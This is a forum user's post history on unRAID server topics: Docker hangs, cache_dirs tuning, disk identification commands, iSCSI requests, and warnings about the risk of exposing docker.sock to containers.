Jump to content


  • Content Count

  • Joined

  • Last visited

Everything posted by NAS

  1. NAS

    Better Defaults

    This is a pretty big deal if it is true. I wouldnt know how to pull this off right now though so more details required.
  2. I think I can actually replicate this now. If i mount a USB drive and copy files continuously to my SSD cache drive which also is the location of my docker loopback image then after a few minutes docker starts to not respond which obviously ruins the web GUI as well. I routinely copied files in this way in all previous versions and the cache drive seems fine (its pretty new) and there are no errors in any log that I can see. The SSD is attached to a motherboard SATA port directly. I am pretty sure it is IO WAIT as load sky rockets. Will wait and see if its an "only me" problem.
  3. Except if you a company or any public body or a registered non profit or anyone with liability cover or any organization that has to comply is ISO accreditation or worldwide equivs or has independent audits or anyone covered by EU GDPR or or.... context is import and whilst most people here are home users plenty unRAID users are not Nice addon. I really mean that. It absolutely has its place but the default advice should always be "be secure unless you really really understand the risks of not being".
  4. yeah i dont think it is there either but i suspect this thread will hang about for years and hit first page on google since its so niche. (anyone else find themselves answering their own question via google in old forum posts... i do more than I care to admit)
  5. I faced an odd issue where the web gui would load but not completely. Specifically the dash wouldnt load but disk view would excluding the action buttons at the bottom. Docker view wouldnt load at all but settings would. Dockers containers did not work or were super slow (hard to say) Manually restarting one container instantly kicked web gui and docker into a working state. I cant replicate.
  6. @limetech can you confirm if this is indeed in `proc` just so I can close this thread down as solved and anyone else that happens upon it knows the definitive answer.
  7. hehe Out of curiusoty i never did find a way to do this by query /proc. Any idea if this data is in there somewhere?
  8. That is excellent thank you very much. I would not have thought to do it like this at all.
  9. I have tried I think all the obvious ways although I still think i missed the one obvious one that works lsblk /dev/md4 NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT md4 9:4 0 3.7T 0 md /mnt/disk4
  10. Sorry if this is obvious but I cant quite nail it down. I have a need for a thing I am doing to find the device name and disk serial starting knowing either "/mnt/disk4" or "/dev/md4" from the shell Does anyone know how to get for example "/dev/sdb1" from this?
  11. I thought I was going mad. This is most certainly a thing.
  12. tl;dr to fully fix this Intel garbage users are going to pay a performance price. The price varies wildly based on user workloads and is basically impossible to predict however I have been in conversation where some devops have seen insane edge cases performance drops. I would suggest the right way to do this is to fix it by default but document an opt out for those that want to accept the risk because it is not possible for normal humans to really understand this beginning to end.
  13. So one of the problems with cache_dirs is that it is at its core a hack. Quite a bit of the user setup is based on educated guesswork and very little info is presented or logged to know how well it is functioning e.g. how many files are being cached, how often is it waking up disks. Most of the performance feedback we can gather is based on timings. Some ideas: track timings and present them as a time based graph for easier analysis store timings outside of rotating logs for easier long term analyisis estimate memory usage In theory we can can reasonably estimate maximum memory requirements by counting potential inode entrys and multiplying it by the inode size . This would allow what/if scenarios to be built where each share can be presented in terms of estimated memory requirements and if we do end up adding a depth per share option the user can tune their settings (and potentially reorganize their data) to cache as efficiently as possible. This will take some reading and experiemtation and unless someone is capable of reading the kernel code to understand how cache pressure impacts this it will always be worst case..... but to my eye this is the direction to go
  14. Sorry to be so long replying. I wanted to wait until I was sure my assumptions fixed the issue before I posted again and time got away from me. tl;dr my fundamental issue was at some point the addon update dropped the includes but not the excludes so it appeared to be working but actually was doing nothing. Changing the settings mostly fixed the issue. I am keen to throw some other ideas into the pot but the most important matter at hand is to deal with the PRs. Forking and getting users to manually pull addons from the internet is sub optimal. There has been some discussion on this above, where are we today with it.
  15. NAS

    ISCSI Support

    I do see the point you are making but statistically it does not matter, any sufficiently large group when asked "what they want" will tend towards 100% coverage of any set of options. This if charted will obviously be a histogram but a forum is a very blunt tool for this kind of requirement gathering. You will have much better results if you either: ask users for their use cases and do the requirements analysis in reserve from there or estimate the base requirements internally and offer a trial working set of features and follow on by capturing the use cases people aren't able to meet with the trial, deciding form there if they are cases you want to support. The second option is what I would do as it allows you to internally debate the 10% effort 90% gain tipping point.
  16. NAS

    ISCSI Support

    Is there a way to add basic support as a trial? I dont know the effort on this but I do know that asking people on the internet what they "need" is generally a bad idea, much like trying to herd cats with an error margin greater than the sample set, you will just tend towards "everything" the more people you ask.
  17. Something weird is going on. I can see cache dirs running and even though I now have /bin/bash /usr/local/emhttp/plugins/dynamix.cache.dirs/scripts/cache_dirs -e appdata -l off -p 0 -D 9999 the cache seems to be perpetually needing disks spun up. How would you like me to debug this further? Update: it is this obvious, have all my cache includes been removed so I end with exclusions only and no inclusions or is there there an implied * include?
  18. Having a hard time learning to love the new adaptive feature. The idea sounds great in practice but I have found that effectively cache dirs doesn't work any more, with all lower level folder access waking up some disks. Certainly this will be user specific but without feedback on how the adaptive caching is working, ideally showing depth per top level folder, timings etc it seems to me people would be better served with a default manual setup. On this note I don't know how other people do this but my ideal use case is to be able to set a global minimum depth and exceptions per folder. Currently I exclude 30% of my array as the data is rarely accessed but very large numbers of files.... however whilst this helps cache dirs a single stray click on one of these top level folders busts the cache and disks spin up. I would love to get into a discussion on how we could enhance this feature as without a word of a lie, it is the most critical one I operate.
  19. The "Update all" in 6.5.3 works well (great work) but it is a bit unintuitive that there are scenarios where the interface is showing some/most/all containers have an update available but the update all button is not there.
  20. NAS

    ISCSI Support

    Coincidentally I was thinking about this the other day along with S3 and it seems, to me at least, that whilst everyone will make a case for features they want, adding protocol support is the one sure fire way to attract new users. I cannot quantify how many users this would be but we can say that every user in the world that wants iSCSI or S3 doesnt buy unRAID. Seems like an "easy" win to me.
  21. I cant see anything but I wanted to check to make sure since this is such a long thread. I am in the process of migrating to XFS and I have found that one RFS disk that will mount happily with unraid wont mount at all with UD. dmesg shows [Tue Jun 19 15:40:36 2018] REISERFS warning (device sdc1): sh-2021 reiserfs_fill_super: can not find reiserfs on sdc1 so before I get into this are there any know relevant issues? Update: well it turns out its pretty obvious why UD cant mount this reiser disk.... thats because it is xfs. # file -sL /dev/sdc* /dev/sdc: DOS/MBR boot sector; partition 1 : ID=0xee, start-CHS (0x0,0,2), end-CHS (0x3ff,255,63), startsector 1, 4294967295 sectors, extended partition table (last) /dev/sdc1: SGI XFS filesystem data (blksz 4096, inosz 512, v2 dirs) any ideas why UD is trying to mount a XFS disks as ResierFS?
  22. https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/ " After tweeting this article out @benhall pointed out that actually the ro setting on the volume mount doesn’t have a lot of effect in terms of security. An attacker with ro access to the socket can still create another container and do something like mount /etc/ into it from the host, essentially giving them root access to the host. So bottom line is don’t mount docker.sock into a container unless you trust its provenance and security… " In general security terms you know things are fundamentally not right with a generic approach when your trying to herd this many cats just to make it less insecure... not secure... less evil.
  23. There is always a risk of breakout of any container but this is the holy grail hack of such a system. But to be clear what this sock feature does. Essentially it gives the container root access as a member of the docker group on the HOST machine.... not the container... the host. This is a specific feature required by the traefik container and not required by almost any other container. It is very very very rare and for good reason.
  24. No I am specifically referring to the exceptional requirement of this container to activate the docker socket feature. This is very unusual.
  25. Long story short if someone roots a container with docker socket enabled its pretty much game over. This is why, much as I think traefik is a beautiful piece of engineering, is build on a hill of sand.